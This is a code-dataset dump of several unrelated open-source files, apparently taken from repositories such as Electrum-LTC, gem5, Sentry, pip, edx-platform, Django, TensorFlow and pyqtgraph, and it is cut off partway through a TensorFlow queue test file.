# to rely on the "4 letter prefixes are unique in bip39 word list" property.
# So we color words that are only in old list.
if option.text in only_old_list:
# yellow bg looks ~ok on both light/dark theme, regardless if (un)selected
option.backgroundBrush = ColorScheme.YELLOW.as_color(background=True)
self.completer = QCompleter(self.wordlist)
delegate = CompleterDelegate(self.seed_e)
self.completer.popup().setItemDelegate(delegate)
self.seed_e.set_completer(self.completer)
def get_seed(self):
text = self.seed_e.text()
return ' '.join(text.split())
def on_edit(self):
s = self.get_seed()
b = self.is_seed(s)
if not self.is_bip39:
t = seed_type(s)
label = _('Seed Type') + ': ' + t if t else ''
else:
from electrum_ltc.keystore import bip39_is_checksum_valid
is_checksum, is_wordlist = bip39_is_checksum_valid(s)
status = ('checksum: ' + ('ok' if is_checksum else 'failed')) if is_wordlist else 'unknown wordlist'
label = 'BIP39' + ' (%s)' % status
self.seed_type_label.setText(label)
self.parent.next_button.setEnabled(b)
# disable suggestions if user already typed an unknown word
for word in self.get_seed().split(" ")[:-1]:
if word not in self.wordlist:
self.seed_e.disable_suggestions()
return
self.seed_e.enable_suggestions()
class KeysLayout(QVBoxLayout):
def __init__(self, parent=None, header_layout=None, is_valid=None, allow_multi=False):
QVBoxLayout.__init__(self)
self.parent = parent
self.is_valid = is_valid
self.text_e = ScanQRTextEdit(allow_multi=allow_multi)
self.text_e.textChanged.connect(self.on_edit)
if isinstance(header_layout, str):
self.addWidget(WWLabel(header_layout))
else:
self.addLayout(header_layout)
self.addWidget(self.text_e)
def get_text(self):
return self.text_e.text()
def on_edit(self):
valid = False
try:
valid = self.is_valid(self.get_text())
except Exception as e:
self.parent.next_button.setToolTip(f'{_("Error")}: {str(e)}')
else:
self.parent.next_button.setToolTip('')
self.parent.next_button.setEnabled(valid)
class SeedDialog(WindowModalDialog):
def __init__(self, parent, seed, passphrase):
WindowModalDialog.__init__(self, parent, ('Vialectrum - ' + _('Seed')))
self.setMinimumWidth(400)
vbox = QVBoxLayout(self)
title = _("Your wallet generation seed is:")
slayout = SeedLayout(title=title, seed=seed, msg=True, passphrase=passphrase)
vbox.addLayout(slayout)
vbox.addLayout(Buttons(CloseButton(self)))
| mit |
BIT-SYS/gem5-spm-module | src/mem/slicc/symbols/RequestType.py | 83 | 1704 | # Copyright (c) 2010 Advanced Micro Devices, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from slicc.symbols.Symbol import Symbol
class RequestType(Symbol):
def __repr__(self):
return "[RequestType: %s]" % self.ident
__all__ = [ "RequestType" ]
| bsd-3-clause |
hahnicity/ace | chapter1/problem3.py | 1 | 1222 | """
Problem 3.
Calculate the time series
yt = 5 + .05 * t + Et (Where E is epsilon)
for years 1960, 1961, ..., 2001 assuming Et independently and
identically distributed with mean 0 and sigma 0.2.
"""
from random import uniform
from matplotlib.pyplot import plot, show
from numpy import array, polyfit, poly1d
def create_distribution(size):
"""
Create independently and identically distributed samples with mean 0
and sigma 0.2.
"""
# A uniform draw on [-0.2, 0.2] is the simplest stand-in here, though its
# standard deviation is 0.4/sqrt(12) ~= 0.115 rather than 0.2;
# random.gauss(0, 0.2) would match the stated sigma exactly.
return array([uniform(-0.2, .2) for _ in xrange(size)])
def create_time_series(start_year, end_year):
"""
Create the time series, yt, then perform a regression on yt, and plot
yt together with its trendline.
"""
t_array = array(range(start_year, end_year + 1))
epsilon_t = create_distribution(len(t_array))
yt = array([5 + .05 * t_i + epsilon_t[i] for i, t_i in enumerate(t_array)])
fit = polyfit(t_array, yt, 1)
fit_func = poly1d(fit)
plot(t_array, yt, "yo", t_array, fit_func(t_array), "--k")
show()
def main():
create_time_series(1960, 2001)
if __name__ == "__main__":
main()
| unlicense |
jean/sentry | src/sentry/celery.py | 4 | 2377 | from __future__ import absolute_import
from django.conf import settings
from celery import Celery
from celery.app.task import Task
from sentry.utils import metrics
DB_SHARED_THREAD = """\
DatabaseWrapper objects created in a thread can only \
be used in that same thread. The object with alias '%s' \
was created in thread id %s and this is thread id %s.\
"""
def patch_thread_ident():
# Monkey-patch Django.
# This patch makes sure that we use real threads to get the ident, since
# thread identity gets monkey-patched when we are using gevent or eventlet.
# -- patch taken from gunicorn
if getattr(patch_thread_ident, 'called', False):
return
try:
from django.db.backends import BaseDatabaseWrapper, DatabaseError
if 'validate_thread_sharing' in BaseDatabaseWrapper.__dict__:
from six.moves import _thread as thread
_get_ident = thread.get_ident
__old__init__ = BaseDatabaseWrapper.__init__
def _init(self, *args, **kwargs):
__old__init__(self, *args, **kwargs)
self._thread_ident = _get_ident()
def _validate_thread_sharing(self):
if (not self.allow_thread_sharing and self._thread_ident != _get_ident()):
raise DatabaseError(
DB_SHARED_THREAD % (self.alias, self._thread_ident, _get_ident()),
)
BaseDatabaseWrapper.__init__ = _init
BaseDatabaseWrapper.validate_thread_sharing = \
_validate_thread_sharing
patch_thread_ident.called = True
except ImportError:
pass
patch_thread_ident()
class SentryTask(Task):
def apply_async(self, *args, **kwargs):
with metrics.timer('jobs.delay', instance=self.name):
return Task.apply_async(self, *args, **kwargs)
class SentryCelery(Celery):
task_cls = SentryTask
def on_configure(self):
from raven.contrib.django.models import client
from raven.contrib.celery import register_signal, register_logger_signal
# register a custom filter to filter out duplicate logs
register_logger_signal(client)
# hook into the Celery error handler
register_signal(client)
app = SentryCelery('sentry')
app.config_from_object(settings)
app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)
| bsd-3-clause |
raajitr/django_hangman | env/lib/python2.7/site-packages/pip/commands/list.py | 339 | 11369 | from __future__ import absolute_import
import json
import logging
import warnings
try:
from itertools import zip_longest
except ImportError:
from itertools import izip_longest as zip_longest
from pip._vendor import six
from pip.basecommand import Command
from pip.exceptions import CommandError
from pip.index import PackageFinder
from pip.utils import (
get_installed_distributions, dist_is_editable)
from pip.utils.deprecation import RemovedInPip10Warning
from pip.cmdoptions import make_option_group, index_group
logger = logging.getLogger(__name__)
class ListCommand(Command):
"""
List installed packages, including editables.
Packages are listed in a case-insensitive sorted order.
"""
name = 'list'
usage = """
%prog [options]"""
summary = 'List installed packages.'
def __init__(self, *args, **kw):
super(ListCommand, self).__init__(*args, **kw)
cmd_opts = self.cmd_opts
cmd_opts.add_option(
'-o', '--outdated',
action='store_true',
default=False,
help='List outdated packages')
cmd_opts.add_option(
'-u', '--uptodate',
action='store_true',
default=False,
help='List uptodate packages')
cmd_opts.add_option(
'-e', '--editable',
action='store_true',
default=False,
help='List editable projects.')
cmd_opts.add_option(
'-l', '--local',
action='store_true',
default=False,
help=('If in a virtualenv that has global access, do not list '
'globally-installed packages.'),
)
self.cmd_opts.add_option(
'--user',
dest='user',
action='store_true',
default=False,
help='Only output packages installed in user-site.')
cmd_opts.add_option(
'--pre',
action='store_true',
default=False,
help=("Include pre-release and development versions. By default, "
"pip only finds stable versions."),
)
cmd_opts.add_option(
'--format',
action='store',
dest='list_format',
choices=('legacy', 'columns', 'freeze', 'json'),
help="Select the output format among: legacy (default), columns, "
"freeze or json.",
)
cmd_opts.add_option(
'--not-required',
action='store_true',
dest='not_required',
help="List packages that are not dependencies of "
"installed packages.",
)
index_opts = make_option_group(index_group, self.parser)
self.parser.insert_option_group(0, index_opts)
self.parser.insert_option_group(0, cmd_opts)
def _build_package_finder(self, options, index_urls, session):
"""
Create a package finder appropriate to this list command.
"""
return PackageFinder(
find_links=options.find_links,
index_urls=index_urls,
allow_all_prereleases=options.pre,
trusted_hosts=options.trusted_hosts,
process_dependency_links=options.process_dependency_links,
session=session,
)
def run(self, options, args):
if options.allow_external:
warnings.warn(
"--allow-external has been deprecated and will be removed in "
"the future. Due to changes in the repository protocol, it no "
"longer has any effect.",
RemovedInPip10Warning,
)
if options.allow_all_external:
warnings.warn(
"--allow-all-external has been deprecated and will be removed "
"in the future. Due to changes in the repository protocol, it "
"no longer has any effect.",
RemovedInPip10Warning,
)
if options.allow_unverified:
warnings.warn(
"--allow-unverified has been deprecated and will be removed "
"in the future. Due to changes in the repository protocol, it "
"no longer has any effect.",
RemovedInPip10Warning,
)
if options.list_format is None:
warnings.warn(
"The default format will switch to columns in the future. "
"You can use --format=(legacy|columns) (or define a "
"format=(legacy|columns) in your pip.conf under the [list] "
"section) to disable this warning.",
RemovedInPip10Warning,
)
if options.outdated and options.uptodate:
raise CommandError(
"Options --outdated and --uptodate cannot be combined.")
packages = get_installed_distributions(
local_only=options.local,
user_only=options.user,
editables_only=options.editable,
)
if options.outdated:
packages = self.get_outdated(packages, options)
elif options.uptodate:
packages = self.get_uptodate(packages, options)
if options.not_required:
packages = self.get_not_required(packages, options)
self.output_package_listing(packages, options)
def get_outdated(self, packages, options):
return [
dist for dist in self.iter_packages_latest_infos(packages, options)
if dist.latest_version > dist.parsed_version
]
def get_uptodate(self, packages, options):
return [
dist for dist in self.iter_packages_latest_infos(packages, options)
if dist.latest_version == dist.parsed_version
]
def get_not_required(self, packages, options):
dep_keys = set()
for dist in packages:
dep_keys.update(requirement.key for requirement in dist.requires())
return set(pkg for pkg in packages if pkg.key not in dep_keys)
def iter_packages_latest_infos(self, packages, options):
index_urls = [options.index_url] + options.extra_index_urls
if options.no_index:
logger.debug('Ignoring indexes: %s', ','.join(index_urls))
index_urls = []
dependency_links = []
for dist in packages:
if dist.has_metadata('dependency_links.txt'):
dependency_links.extend(
dist.get_metadata_lines('dependency_links.txt'),
)
with self._build_session(options) as session:
finder = self._build_package_finder(options, index_urls, session)
finder.add_dependency_links(dependency_links)
for dist in packages:
typ = 'unknown'
all_candidates = finder.find_all_candidates(dist.key)
if not options.pre:
# Remove prereleases
all_candidates = [candidate for candidate in all_candidates
if not candidate.version.is_prerelease]
if not all_candidates:
continue
best_candidate = max(all_candidates,
key=finder._candidate_sort_key)
remote_version = best_candidate.version
if best_candidate.location.is_wheel:
typ = 'wheel'
else:
typ = 'sdist'
# This is dirty but makes the rest of the code much cleaner
dist.latest_version = remote_version
dist.latest_filetype = typ
yield dist
def output_legacy(self, dist):
if dist_is_editable(dist):
return '%s (%s, %s)' % (
dist.project_name,
dist.version,
dist.location,
)
else:
return '%s (%s)' % (dist.project_name, dist.version)
def output_legacy_latest(self, dist):
return '%s - Latest: %s [%s]' % (
self.output_legacy(dist),
dist.latest_version,
dist.latest_filetype,
)
def output_package_listing(self, packages, options):
packages = sorted(
packages,
key=lambda dist: dist.project_name.lower(),
)
if options.list_format == 'columns' and packages:
data, header = format_for_columns(packages, options)
self.output_package_listing_columns(data, header)
elif options.list_format == 'freeze':
for dist in packages:
logger.info("%s==%s", dist.project_name, dist.version)
elif options.list_format == 'json':
logger.info(format_for_json(packages, options))
else: # legacy
for dist in packages:
if options.outdated:
logger.info(self.output_legacy_latest(dist))
else:
logger.info(self.output_legacy(dist))
def output_package_listing_columns(self, data, header):
# insert the header first: we need to know the size of column names
if len(data) > 0:
data.insert(0, header)
pkg_strings, sizes = tabulate(data)
# Create and add a separator.
if len(data) > 0:
pkg_strings.insert(1, " ".join(map(lambda x: '-' * x, sizes)))
for val in pkg_strings:
logger.info(val)
def tabulate(vals):
# From pfmoore on GitHub:
# https://github.com/pypa/pip/issues/3651#issuecomment-216932564
assert len(vals) > 0
sizes = [0] * max(len(x) for x in vals)
for row in vals:
sizes = [max(s, len(str(c))) for s, c in zip_longest(sizes, row)]
result = []
for row in vals:
display = " ".join([str(c).ljust(s) if c is not None else ''
for s, c in zip_longest(sizes, row)])
result.append(display)
return result, sizes
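# Example (illustrative): tabulate([['Package', 'Version'], ['pip', '9.0.1']])
# returns (['Package Version', 'pip     9.0.1  '], [7, 7]) -- every cell is
# left-justified to the widest entry in its column.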
def format_for_columns(pkgs, options):
"""
Convert the package data into something usable
by output_package_listing_columns.
"""
running_outdated = options.outdated
# Adjust the header for the `pip list --outdated` case.
if running_outdated:
header = ["Package", "Version", "Latest", "Type"]
else:
header = ["Package", "Version"]
data = []
if any(dist_is_editable(x) for x in pkgs):
header.append("Location")
for proj in pkgs:
# if we're working on the 'outdated' list, separate out the
# latest_version and type
row = [proj.project_name, proj.version]
if running_outdated:
row.append(proj.latest_version)
row.append(proj.latest_filetype)
if dist_is_editable(proj):
row.append(proj.location)
data.append(row)
return data, header
def format_for_json(packages, options):
data = []
for dist in packages:
info = {
'name': dist.project_name,
'version': six.text_type(dist.version),
}
if options.outdated:
info['latest_version'] = six.text_type(dist.latest_version)
info['latest_filetype'] = dist.latest_filetype
data.append(info)
return json.dumps(data)
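# Example (illustrative): for a single installed package the returned JSON
# string looks like '[{"name": "pip", "version": "9.0.1"}]'.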
| mit |
philanthropy-u/edx-platform | lms/djangoapps/teams/management/commands/tests/test_reindex_course_team.py | 13 | 3583 | """
Tests for course_team reindex command
"""
import ddt
from django.core.management import CommandError, call_command
from mock import patch
from opaque_keys.edx.keys import CourseKey
from search.search_engine_base import SearchEngine
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase
from ....search_indexes import CourseTeamIndexer
from ....tests.factories import CourseTeamFactory
COURSE_KEY1 = CourseKey.from_string('edx/history/1')
@ddt.ddt
class ReindexCourseTeamTest(SharedModuleStoreTestCase):
"""
Tests for the ReindexCourseTeam command
"""
shard = 4
def setUp(self):
"""
Set up tests.
"""
super(ReindexCourseTeamTest, self).setUp()
self.team1 = CourseTeamFactory(course_id=COURSE_KEY1, team_id='team1')
self.team2 = CourseTeamFactory(course_id=COURSE_KEY1, team_id='team2')
self.team3 = CourseTeamFactory(course_id=COURSE_KEY1, team_id='team3')
self.search_engine = SearchEngine.get_search_engine(index='index_course_team')
def test_given_no_arguments_raises_command_error(self):
"""
Test that raises CommandError for incorrect arguments.
"""
with self.assertRaisesRegexp(CommandError, '.*At least one course_team_id or --all needs to be specified.*'):
call_command('reindex_course_team')
def test_given_conflicting_arguments_raises_command_error(self):
"""
Test that raises CommandError for incorrect arguments.
"""
with self.assertRaisesRegexp(CommandError, '.*Course teams cannot be specified when --all is also specified.*'):
call_command('reindex_course_team', self.team1.team_id, all=True)
@patch.dict('django.conf.settings.FEATURES', {'ENABLE_TEAMS': False})
def test_teams_search_flag_disabled_raises_command_error(self):
"""
Test that raises CommandError for disabled feature flag.
"""
with self.assertRaisesRegexp(CommandError, '.*ENABLE_TEAMS must be enabled.*'):
call_command('reindex_course_team', self.team1.team_id)
def test_given_invalid_team_id_raises_command_error(self):
"""
Test that raises CommandError for invalid team id.
"""
team_id = u'team4'
error_str = 'Argument {} is not a course_team team_id'.format(team_id)
with self.assertRaisesRegexp(CommandError, error_str):
call_command('reindex_course_team', team_id)
@patch.object(CourseTeamIndexer, 'index')
def test_single_team_id(self, mock_index):
"""
Test that command indexes a single passed team.
"""
call_command('reindex_course_team', self.team1.team_id)
mock_index.assert_called_once_with(self.team1)
mock_index.reset_mock()
@patch.object(CourseTeamIndexer, 'index')
def test_multiple_team_id(self, mock_index):
"""
Test that command indexes multiple passed teams.
"""
call_command('reindex_course_team', self.team1.team_id, self.team2.team_id)
mock_index.assert_any_call(self.team1)
mock_index.assert_any_call(self.team2)
mock_index.reset_mock()
@patch.object(CourseTeamIndexer, 'index')
def test_all_teams(self, mock_index):
"""
Test that command indexes all teams.
"""
call_command('reindex_course_team', all=True)
mock_index.assert_any_call(self.team1)
mock_index.assert_any_call(self.team2)
mock_index.assert_any_call(self.team3)
mock_index.reset_mock()
| agpl-3.0 |
zhaodelong/django | django/core/mail/backends/base.py | 577 | 1573 | """Base email backend class."""
class BaseEmailBackend(object):
"""
Base class for email backend implementations.
Subclasses must at least overwrite send_messages().
open() and close() can be called indirectly by using a backend object as a
context manager:
with backend as connection:
# do something with connection
pass
"""
def __init__(self, fail_silently=False, **kwargs):
self.fail_silently = fail_silently
def open(self):
"""Open a network connection.
This method can be overwritten by backend implementations to
open a network connection.
It's up to the backend implementation to track the status of
a network connection if it's needed by the backend.
This method can be called by applications to force a single
network connection to be used when sending mails. See the
send_messages() method of the SMTP backend for a reference
implementation.
The default implementation does nothing.
"""
pass
def close(self):
"""Close a network connection."""
pass
def __enter__(self):
self.open()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def send_messages(self, email_messages):
"""
Sends one or more EmailMessage objects and returns the number of email
messages sent.
"""
raise NotImplementedError('subclasses of BaseEmailBackend must override send_messages() method')
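# Illustrative subclass sketch (not part of Django; 'ConsoleBackend' is a
# hypothetical name). A working backend only needs send_messages() and
# should return the number of messages handled:
#
# class ConsoleBackend(BaseEmailBackend):
#     def send_messages(self, email_messages):
#         for message in email_messages:
#             print(message.message().as_string())
#         return len(email_messages)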
| bsd-3-clause |
dendisuhubdy/tensorflow | tensorflow/compiler/tests/bucketize_op_test.py | 7 | 2995 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for bucketize_op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.compiler.tests.xla_test import XLATestCase
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
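# Semantics exercised below: an input x lands in bucket i where i is the
# number of boundaries <= x; e.g. with boundaries [0, 3, 8, 11], x=5 maps
# to bucket 2 and x=11 to bucket 4.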
class BucketizationOpTest(XLATestCase):
def testInt(self):
with self.test_session() as sess:
p = array_ops.placeholder(dtypes.int32)
with self.test_scope():
op = math_ops._bucketize(p, boundaries=[0, 3, 8, 11])
expected_out = [0, 1, 1, 2, 2, 3, 3, 4, 4]
self.assertAllEqual(expected_out,
sess.run(op, {p: [-5, 0, 2, 3, 5, 8, 10, 11, 12]}))
def testFloat(self):
with self.test_session() as sess:
p = array_ops.placeholder(dtypes.float32)
with self.test_scope():
op = math_ops._bucketize(p, boundaries=[0., 3., 8., 11.])
expected_out = [0, 1, 1, 2, 2, 3, 3, 4, 4]
self.assertAllEqual(
expected_out,
sess.run(op, {p: [-5., 0., 2., 3., 5., 8., 10., 11., 12.]}))
def test2DInput(self):
with self.test_session() as sess:
p = array_ops.placeholder(dtypes.float32)
with self.test_scope():
op = math_ops._bucketize(p, boundaries=[0, 3, 8, 11])
expected_out = [[0, 1, 1, 2, 2], [3, 3, 4, 4, 1]]
self.assertAllEqual(
expected_out, sess.run(op,
{p: [[-5, 0, 2, 3, 5], [8, 10, 11, 12, 0]]}))
def testInvalidBoundariesOrder(self):
with self.test_session() as sess:
p = array_ops.placeholder(dtypes.int32)
with self.test_scope():
op = math_ops._bucketize(p, boundaries=[0, 8, 3, 11])
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
"Expected sorted boundaries"):
sess.run(op, {p: [-5, 0]})
def testBoundariesNotList(self):
with self.test_session():
with self.assertRaisesRegexp(TypeError, "Expected list.*"):
p = array_ops.placeholder(dtypes.int32)
with self.test_scope():
math_ops._bucketize(p, boundaries=0)
if __name__ == "__main__":
test.main()
| apache-2.0 |
robertsj/poropy | pyqtgraph/ThreadsafeTimer.py | 1 | 1600 | from pyqtgraph.Qt import QtCore, QtGui
class ThreadsafeTimer(QtCore.QObject):
"""
Thread-safe replacement for QTimer.
"""
timeout = QtCore.Signal()
sigTimerStopRequested = QtCore.Signal()
sigTimerStartRequested = QtCore.Signal(object)
def __init__(self):
QtCore.QObject.__init__(self)
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.timerFinished)
self.timer.moveToThread(QtCore.QCoreApplication.instance().thread())
self.moveToThread(QtCore.QCoreApplication.instance().thread())
self.sigTimerStopRequested.connect(self.stop, QtCore.Qt.QueuedConnection)
self.sigTimerStartRequested.connect(self.start, QtCore.Qt.QueuedConnection)
def start(self, timeout):
isGuiThread = QtCore.QThread.currentThread() == QtCore.QCoreApplication.instance().thread()
if isGuiThread:
#print "start timer", self, "from gui thread"
self.timer.start(timeout)
else:
#print "start timer", self, "from remote thread"
self.sigTimerStartRequested.emit(timeout)
def stop(self):
isGuiThread = QtCore.QThread.currentThread() == QtCore.QCoreApplication.instance().thread()
if isGuiThread:
#print "stop timer", self, "from gui thread"
self.timer.stop()
else:
#print "stop timer", self, "from remote thread"
self.sigTimerStopRequested.emit()
def timerFinished(self):
self.timeout.emit() | mit |
allenlavoie/tensorflow | tensorflow/python/kernel_tests/random/random_shuffle_queue_test.py | 19 | 50578 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.Queue."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
class RandomShuffleQueueTest(test.TestCase):
def setUp(self):
# Useful for debugging when a test times out.
super(RandomShuffleQueueTest, self).setUp()
tf_logging.error("Starting: %s", self._testMethodName)
def tearDown(self):
super(RandomShuffleQueueTest, self).tearDown()
tf_logging.error("Finished: %s", self._testMethodName)
def testEnqueue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
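      # The positional arguments are capacity (10), min_after_dequeue (5) and
      # the component dtype.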
enqueue_op = q.enqueue((10.0,))
self.assertAllEqual(0, q.size().eval())
enqueue_op.run()
self.assertAllEqual(1, q.size().eval())
def testEnqueueWithShape(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=tensor_shape.TensorShape([3, 2]))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
self.assertAllEqual(1, q.size().eval())
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
def testEnqueueManyWithShape(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (2,)])
q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
self.assertAllEqual(4, q.size().eval())
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shapes=tensor_shape.TensorShape([3]))
q2.enqueue(([1, 2, 3],))
q2.enqueue_many(([[1, 2, 3]],))
def testScalarShapes(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (1,)])
q.enqueue_many([[1, 2, 3, 4], [[5], [6], [7], [8]]]).run()
q.enqueue([9, [10]]).run()
dequeue_t = q.dequeue()
results = []
for _ in range(2):
a, b = sess.run(dequeue_t)
results.append((a, b))
a, b = sess.run(q.dequeue_many(3))
for i in range(3):
results.append((a[i], b[i]))
self.assertItemsEqual([(1, [5]), (2, [6]), (3, [7]), (4, [8]), (9, [10])],
results)
def testParallelEnqueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
sess.run(enqueue_op)
threads = [
self.checkedThread(
target=enqueue, args=(e,)) for e in enqueue_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in xrange(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
vals = [dequeued_t.eval() for _ in xrange(len(elems))]
self.assertItemsEqual(elems, vals)
def testEnqueueAndBlockingDequeue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(3, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for enqueue_op in enqueue_ops:
sess.run(enqueue_op)
results = []
def dequeue():
for _ in xrange(len(elems)):
results.append(sess.run(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, results)
def testMultiEnqueueAndDequeue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.int32, dtypes_lib.float32))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
results = []
for _ in xrange(len(elems)):
x, y = sess.run(dequeued_t)
results.append((x, y))
self.assertItemsEqual(elems, results)
def testQueueSizeEmpty(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
self.assertEqual(0, q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual([1], size.eval())
dequeued_t.op.run()
self.assertEqual([0], size.eval())
def testEnqueueMany(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + elems, results)
def testEmptyEnqueueMany(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
empty_t = constant_op.constant(
[], dtype=dtypes_lib.float32, shape=[0, 2, 3])
enqueue_op = q.enqueue_many((empty_t,))
size_t = q.size()
self.assertEqual(0, size_t.eval())
enqueue_op.run()
self.assertEqual(0, size_t.eval())
def testEmptyDequeueMany(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], dequeued_t.eval().tolist())
enqueue_op.run()
self.assertEqual([], dequeued_t.eval().tolist())
def testEmptyDequeueUpTo(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
